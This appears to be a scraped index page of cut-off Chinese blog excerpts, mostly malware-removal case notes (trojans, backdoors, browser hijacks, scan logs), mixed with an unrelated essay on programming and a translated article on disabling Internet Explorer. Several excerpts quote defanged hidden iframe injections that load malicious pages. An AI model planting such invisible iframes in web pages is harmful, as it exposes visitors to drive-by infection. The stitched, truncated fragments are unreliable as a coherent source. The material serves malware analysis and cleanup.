其他

檔案夾生出.exe尾巴？原來是MS-DOS.com,fonts.exe,Default.exe,HelpHost.com等做怪2 endurer 原創2009-02-25 第1版 （續1） 部分惡意程式資訊 檔案說明符 : D:/auto.exe屬性 : --HR數位簽章:否PE檔案:是擷取檔案版本資訊大小失敗!建立時間 : 2008-9-20 16:28:13修改時間 : 2008-9-13 4:43:36大小 : 33276 位元組 32.508 KBMD5 : 83db0cdad746f7

Learn two ways to disable Internet Explorer學習兩種禁用IE的方法by  Michael Mullins CCNA, MCP作者：Michael Mullins CCNA, MCP翻譯：endurerKeywords:  Web browsers | Security threats | Microsoft Windows | Security management關鍵字：網頁瀏覽器 | 安全威脅 | 微軟Windows |

endurer 原創2006-11-08 第1版該圖書資訊網首頁首部被加入代碼：＜iframe src=hxxp://www*.book***info**.com.cn/change.htm width=0 height=0 frameborder=0＞＜/iframe＞change.htm 的內容為：/--------＜html＞ ＜iframe src="hxxp://www*.book***info**.com.cn/ind/caohui.htm" width="0" height="0"

http://news.csdn.net/news/newstopic/28/28075.shtml來自：程式員作者：風化 （轉載請保留作者資訊）謹以此文獻給所有想當程式員的朋友（一）

endurer 原創2006-12-28 第1版 昨晚分析 開啟某IT技術問答網站時自動下載檔案sinze.exehttp://endurer.bokee.com/5994845.htmlhttp://blog.csdn.net/Purpleendurer/archive/2006/12/27/1465125.aspx 中的網頁，習慣性的在Maxthon地址欄輸入view-source:網址，斷行符號，居然顯示出錯頁面……檢查拼字，沒有錯誤……用 google

作者：雪色天空　　記得有人說過，一名真正的圍棋高手，其人生是要用“一生懸命”四個字來形容的。我只是圍棋低手，限於水平，未能更多地理解其中的精妙與玄機，然而，我卻清清楚楚明明白白地知道，有另一種人生，倘加之於這四個字，卻是真正當之無愧的，這，就是程式員的人生。　　電腦很難懂，電腦中最難懂的卻是程式設計，人說“棋如人生”，我卻以為，程式同樣如人生。真正的程式員可以感受到，一個程式中，從整體架構到每一個細節，無不融入了程式員對人生的感悟與體驗，程式的每一個模組，每一個過程，每一條語句，無不折射出人生的

endurer　原創2006-05-10　第3版　補充一個執行個體2006-05-06　第2版　補充卡巴斯基的反應2006-05-03　第1版有網友遇到71791.com瀏覽器劫持問題，與我以前寫的分析和解決方案（見：關於www.71791.com的問題 ）不同，並把HijackThis掃描的log發了過來。在log中，發現如下可疑項目：  作業系統：  Windows XP SP1 (WinNT 5.01.2600)瀏覽器：    Internet Explorer v6.00 SP1 (6.

ARP病毒加的網址傳播Trojan.PSW.Win32.OnlineGames.GEN等endurer　原創2008-02-26　第1版該病毒會向所網頁加入代碼：/---＜iframe src=hxxp://a**d*.1**02**4.mo*.cn/SHUI**/4.HTM width=0 height=0＞＜/iframe＞---/1 hxxp://a**d*.1**02**4.mo*.cn/SHUI**/4.HTM包含代碼：/---＜iframe src=hxxp://www.i**mm*

endurer　原創2006-08-16 第1版有一位網友電腦這幾天瑞星總報告發現RootKit.Vanti.kn、Trojan.PSW.JHOnline.eqo、Trojan.PSW.LMir.ktn等病毒，請偶幫忙看看。先運行瑞星註冊表修複工具，沒有發現被修改的項目。然後檢查瑞星的殺毒曆史，開啟瑞星注視窗，發現瑞星病毒庫還是8月10日的，立即升級。再檢查瑞星的定時升級設定，升級頻率居然是一個星期，改成每天一次。瑞星升級完成後，查殺記憶體、引導區和C盤。同時到

滑鼠有時亂跑？毒霸、卡巴衝突還是BackDoor.PcClient引起？endurer 原創2007-07-16 第1版昨晚一位網友說他的電腦的滑鼠有時會亂跑，讓偶QQ遠程協助。有點懷疑網友的電腦中了後門。下載 pe_xscan 掃描 log 分析，發現：/---pe_xscan 07-06-23 by Purple Endurer2007-7-15 21:28:25Windows XP Service Pack 2(5.1.2600)管理使用者組O2 - BHO Tencent

機器狗打敗卡卡獅？瑞星監控變紅傘2endurer 原創2008-02-24 第1版（續：機器狗打敗卡卡獅？瑞星監控變紅傘1http://blog.csdn.net/Purpleendurer/archive/2008/02/23/2114717.aspxhttp://endurer.bokee.com/6634438.htmlhttp://blog.nnsky.com/blog_view_302078.htmlhttp://blog.sina.com.cn/s/blog_49926d910100

endurer 原創2006-11-18 第1版GMER中提供了一個CMD，可以在上面的文字框輸入命令列命令（可以輸入多條命令），而在下面的文字框中顯示命令列的執行結果。 某天檢查windows系統檔案夾，發現一個名為gmer.bat的檔案，開啟一看，裡面的內容是上次在GMER的CMD中輸入的命令。看來GMER是把使用者輸入的命令先儲存到gmer.bat，再在後台運行gmer.bat，擷取gmer.bat的執行結果後在GMER中顯示。

檔案夾生出.exe尾巴？原來是MS-DOS.com,fonts.exe,Default.exe,HelpHost.com等做怪1endurer 原創2009-02-23 第1版最近一位朋友的電腦出現了奇怪的現象：原來明明是一個檔案夾，現在卻長出了.exe尾巴，變成了一個可執行檔。請偶幫忙看看。 朋友電腦中的C盤使用了“windows小冰箱”來保護，沒有安裝殺毒軟體。 下載 pe_xscan 掃描 log 並分析，發現如下可疑項（進程模組略）：pe_xscan 09-01-08 by

endurer　原創2006-08-17 第1版一位網友的電腦，這兩天瑞星開機掃描總報告發現Backdoor.Gpigeon.uql。如：/------------病毒名稱 處理結果 發現日期 路徑檔案病毒來源Backdoor.Gpigeon.uql 清除成功  2006-08-15 18:08 IEXPLORE.EXE>>C:/Program Files/Internet Explorer/IEXPLORE.EXE本機------------/使用HijackThis（可以到

Trojan.PSW.Win32.GameOL,Trojan.Win32.Undef,Trojan.DL.Win32.Undef等1endurer 原創2008-09-11 第1版今天一位朋友的電腦最近反應很慢，請偶幫忙檢修。開啟工作管理員，發現一個名為kcodn32.exe的陌生進程，終止了。用pe_xscan 掃描 log 分析，發現如下可疑項： /===pe_xscan 08-08-01 by Purple Endurer 2000-9-11 17:36:12 Windows XP

endurer 原創2007-01-09 第1版今天中午，一位網友說他電腦中的卡巴到期了，讓偶幫換殺軟。這位網友電腦中裝有偶辛辛苦苦找來的 KIS 6，應該是12月才到期的啊。上門檢查，果然卡巴提示到期了……雖然可以手頭上有可以使用半年的KAV6的KEY，但為了避免麻煩，還是裝個可以用一年的瑞星下載版罷。到瑞星網站把瑞星殺毒軟體和防火牆軟體安裝程式下載過來……剛卸掉 KIS

 fontsapcum.dll,aaudstum.sys,HBKernel.sys,Hev32_c.sys,Windows64.Sys等1endurer 原創2008-07-23 第1版一位朋友說他的電腦昨晚中了病毒，系統曾提示系統檔案被替換，要求插入windows安裝光碟片；開啟IE時系統失去響應……用瑞星查殺病毒後，IME表徵圖不見了，請偶幫忙檢修。用 pe_xscan 掃描 log 並分析，發現如下可疑項： pe_xscan 08-07-02 by Purple Endurer 2008-

又遇灰鴿子GrayPigeon_Hacker.com.cn endurer 原創2009-02-16 第1版 一位網友的電腦的滑鼠會自己活動，進行開啟視窗之類操作，覺得可能是被別人遠端控制了。請偶協助檢查。用網友的電腦中裝的超級巡警檢查系統服務，發現一個名為GrayPigeon_Hacker.com.cn的服務項，明顯是灰鴿子的。用pe_xscan 掃描出來如下： O23 - 服務: GrayPigeon_Hacker.com.cn (GrayPigeon_Hacker.com.cn) - C:

endurer　原創2006.11.10　 第1版一位網友的電腦最近運行速度超慢，讓偶幫忙檢查看看。通過QQ遠程協助進行。到 http://endurer.ys168.com 下載 HijackThis 掃描log，發現如下可疑項：/----------Logfile of HijackThis v1.99.1Scan saved at 10:18:40, on 2006-11-10Platform: Windows XP  (WinNT 5.01.2600)MSIE: Internet

endurer 原創2007-01-29 第2版 補充 Kaspersky 的反應2007-01-28 第1版QQ收到的資訊中包含網址：hxxp://hiuz***uo*ai.cn/hxxp://hiuz***uo*ai.cn/　的網頁中包含代碼：/-------＜IFRAME marginWidth=0 marginHeight=0 src="hxxp://i***v*r.bt***fan.net/xskj.htm" frameBorder=0 width=0 scrolling=no